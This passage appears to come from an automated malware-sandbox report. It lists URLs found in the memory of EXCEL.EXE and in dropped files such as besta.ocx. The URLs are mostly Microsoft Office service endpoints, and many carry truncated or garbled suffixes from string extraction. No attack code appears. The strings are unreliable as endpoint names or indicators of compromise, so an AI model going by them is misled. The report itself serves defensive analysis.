    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://officesetup.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://officesetup.getmicrosoftkey.coms
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ogma.osi.office.net/TradukoApi/api/v1.0/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentities/sche
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officeentitiesupdated
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentities
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesk
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://omex.cdn.office.net/addinclassifier/officesharedentitiesupdated
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://onedrive.live.com
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://onedrive.live.com/embed?
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com/embed?i
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.com4
    Source: EXCEL.EXE, 00000001.00000003.382505599.0000000013048000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580901025.0000000013048000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comOneDriveLogUploadServicehttps://storage.live.com/clientlogs/uploadlocationM
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://onedrive.live.comed
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://osi.office.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netQ-
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netX-
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://osi.office.netst
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://otelrules.azureedge.net
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office.com
    Source: EXCEL.EXE, 00000001.00000003.420487030.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577929196.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382801866.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433675805.000000000F668000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office.com/
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office.com/autosuggest/api/v1/init?cvid=
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comC
    Source: EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comSharepointFilesHostFormat
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comonG
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office.comships
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580437283.0000000012F52000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494575204.0000000012F4C000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com
    Source: EXCEL.EXE, 00000001.00000003.282355078.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439358085.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.421588516.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420487030.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456199157.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491646356.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461659602.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581635779.0000000015990000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.577929196.000000000F66F000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580998572.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382801866.000000000F668000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434685629.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382563366.000000001308B000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.433675805.000000000F668000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.jsonwr9
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=OutlookMBI_SSL_SHORT
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://pages.store.office.com/review/query
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryTemplateStarthttps://
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/review/queryrd
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://pages.store.office.com/webapplandingpage.aspxAwsCgQueryhttps://
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
    Source: EXCEL.EXE, 00000001.00000002.579794121.0000000012E6D000.00000004.00000001.sdmpString found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptionsmU
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json3-U
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmpString found in binary or memory: https://portal.office.
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmpString found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13db8
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://powerlift-frontdesk.acompli.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://powerlift-frontdesk.acompli.netPowerLiftGymBaseUrlhttps://powerlift.acompli.netSubstrateOffi
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://powerlift.acompli.net
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://roaming.edog.
    Source: EXCEL.EXE, 00000001.00000002.579755476.0000000012E2B000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
    Source: EXCEL.EXE, 00000001.00000003.382012892.0000000015A33000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://s.w.org/images/core/emoji/13.1.0/svg/1f609.svg
    Source: EXCEL.EXE, 00000001.00000002.580981700.0000000013083000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.456615459.0000000013083000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382557056.0000000013083000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491634483.0000000013083000.00000004.00000001.sdmp, besta.ocx.1.dr, BX1IWYL9.htm.1.drString found in binary or memory: https://schema.org
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://settings.outlook.com
    Source: EXCEL.EXE, 00000001.00000002.581651772.00000000159A1000.00000004.00000001.sdmpString found in binary or memory: https://settings.outlook.comS
    Source: EXCEL.EXE, 00000001.00000003.494745897.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.434093599.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455806682.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420762859.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382238814.0000000012EDA000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580027770.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439031880.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461211560.0000000012ED5000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491715403.0000000012ED5000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://shell.suite.office.com:1443
    Source: EXCEL.EXE, 00000001.00000003.434130284.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.580203373.0000000012F29000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.382272672.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.420829297.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.494716030.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.461288590.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.455845066.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.439067632.0000000012F1D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.491763903.0000000012F1D000.00000004.00000001.sdmp, 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://skyapi.live.net/Activity/
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workPowerBIGetDatasetsApihttps://api.pow
    Source: EXCEL.EXE, 00000001.00000002.581598775.0000000015940000.00000004.00000001.sdmpString found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oau
    Source: 72CBFE55-51D8-483F-AB8D-10F17659EA7C.1.drString found in binary or memory: https://staging.cortana.ai
